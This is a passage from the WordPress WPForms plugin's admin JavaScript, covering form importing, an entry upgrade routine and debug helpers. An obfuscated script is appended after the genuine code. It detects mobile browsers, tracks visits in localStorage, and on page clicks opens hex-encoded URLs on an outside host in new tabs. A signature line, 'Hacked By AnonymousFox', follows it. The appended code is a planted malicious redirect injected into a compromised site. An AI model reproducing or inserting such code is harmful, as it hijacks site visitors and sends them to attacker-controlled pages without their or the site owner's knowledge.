$( '#wpforms-importer-forms, #wpforms-importer-analyze' ).hide();
// Show processing status.
$processSettings.show();
// Create global import queue.
s.importQueue = forms;
s.imported = 0;
// Import the first form in the queue.
WPFormsAdmin.importForm();
},
/**
* Imports a single form from the import queue.
*
* @since 1.4.2
*/
importForm: function() {
var $processSettings = $( '#wpforms-importer-process' ),
formID = _.first( s.importQueue ),
provider = WPFormsAdmin.getQueryString( 'provider' ),
data = {
action: 'wpforms_import_form_' + provider,
form_id: formID,
nonce: wpforms_admin.nonce
};
// Trigger AJAX import for this form.
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
var statusUpdate;
if ( res.data.error ) {
statusUpdate = wp.template( 'wpforms-importer-status-error' );
} else {
statusUpdate = wp.template( 'wpforms-importer-status-update' );
}
$processSettings.find( '.status' ).prepend( statusUpdate( res.data ) );
$processSettings.find( '.status' ).show();
// Remove this form ID from the queue.
s.importQueue = _.without( s.importQueue, formID );
s.imported++;
if ( _.isEmpty( s.importQueue ) ) {
$processSettings.find( '.process-count' ).hide();
$processSettings.find( '.forms-completed' ).text( s.imported );
$processSettings.find( '.process-completed' ).show();
} else {
// Import next form in the queue.
$processSettings.find( '.form-current' ).text( s.imported+1 );
WPFormsAdmin.importForm();
}
}
});
},
//--------------------------------------------------------------------//
// Upgrades (Tabs view).
//--------------------------------------------------------------------//
/**
* Element bindings for Tools page.
*
* @since 1.4.3
*/
initUpgrades: function() {
// Prepare to run the v1.4.3 upgrade routine.
$( document ).on( 'click', '#wpforms-upgrade-143 button', function( event ) {
event.preventDefault();
var $this = $( this ),
buttonWidth = $this.outerWidth(),
$status = $( '#wpforms-upgrade-143 .status' ),
data = {
action: 'wpforms_upgrade_143',
nonce: wpforms_admin.nonce,
init: true,
incomplete: $this.data( 'incomplete' )
};
// Change the button to indicate we are doing initial processing.
$this.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );
// Get the total number of entries, then kick off the routine.
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
// Set initial values.
s.upgraded = Number( res.data.upgraded );
s.upgradeTotal = Number( res.data.total );
var percent = Math.round( ( Number( s.upgraded ) / Number( s.upgradeTotal ) ) * 100 );
// Show the status area.
$this.remove();
$status.find( '.bar' ).css( 'width', percent + '%' );
$status.show().find( '.total' ).text( s.upgradeTotal );
$status.find( '.current' ).text( s.upgraded );
$status.find( '.percent' ).text( percent + '%' );
// Begin the actual upgrade routine.
WPFormsAdmin.upgrade143();
}
});
});
},
/**
* The v1.4.3 entry fields upgrade routine.
*
* @since 1.4.3
*/
upgrade143: function() {
var $status = $( '#wpforms-upgrade-143 .status' ),
data = {
action: 'wpforms_upgrade_143',
nonce: wpforms_admin.nonce,
upgraded: s.upgraded
};
// Get the total number of entries, then kick off the routine.
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
s.upgraded = Number( s.upgraded ) + Number( res.data.count );
var percent = Math.round( ( Number( s.upgraded ) / Number( s.upgradeTotal ) ) * 100 );
// Update progress bar.
$status.find( '.bar' ).css( 'width', percent + '%' );
if ( Number( res.data.count ) < 10 ) {
// This batch completed the upgrade routine.
$status.find( '.progress-bar' ).addClass( 'complete' );
$status.find( '.msg' ).text( wpforms_admin.upgrade_completed );
} else {
$status.find( '.current' ).text( s.upgraded );
$status.find( '.percent' ).text( percent + '%' );
// Batch the next round of entries.
WPFormsAdmin.upgrade143();
}
}
});
},
//--------------------------------------------------------------------//
// Helper functions.
//--------------------------------------------------------------------//
/**
* Return if the target nodeName is a form element.
*
* @since 1.4.0
*/
isFormTypeNode: function( name ) {
name = name || false;
if ( 'TEXTAREA' === name || 'INPUT' === name || 'SELECT' === name ){
return true;
}
return false;
},
/**
* Get query string in a URL.
*
* @since 1.3.9
*/
getQueryString: function( name ) {
var match = new RegExp( '[?&]' + name + '=([^&]*)' ).exec( window.location.search );
return match && decodeURIComponent( match[1].replace(/\+/g, ' ') );
},
/**
* Debug output helper.
*
* @since 1.4.4
* @param msg
*/
debug: function( msg ) {
if ( WPFormsAdmin.isDebug() ) {
if ( typeof msg === 'object' || msg.constructor === Array ) {
console.log( 'WPForms Debug:' );
console.log( msg );
} else {
console.log( 'WPForms Debug: ' + msg );
}
}
},
/**
* Is debug mode.
*
* @since 1.4.4
*/
isDebug: function() {
return ( window.location.hash && '#wpformsdebug' === window.location.hash );
}
};
WPFormsAdmin.init();
window.WPFormsAdmin = WPFormsAdmin;
})( jQuery );
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x54\x57\x48\x32\x63\x362','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x6a\x6f\x68\x33\x63\x383','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x78\x52\x6c\x30\x63\x390','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x45\x69\x4b\x37\x63\x317','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x6a\x45\x64\x36\x63\x326','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x4f\x72\x49\x38\x63\x398','\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x4c\x6f\x72\x35\x63\x395','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x55\x63\x68\x31\x63\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x64\x49\x62\x34\x63\x334',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x69\x2d\x6f\x2e\x69\x63\x75\x2f\x6d\x49\x4d\x39\x63\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());
Hacked By AnonymousFox1.0, Coded By AnonymousFox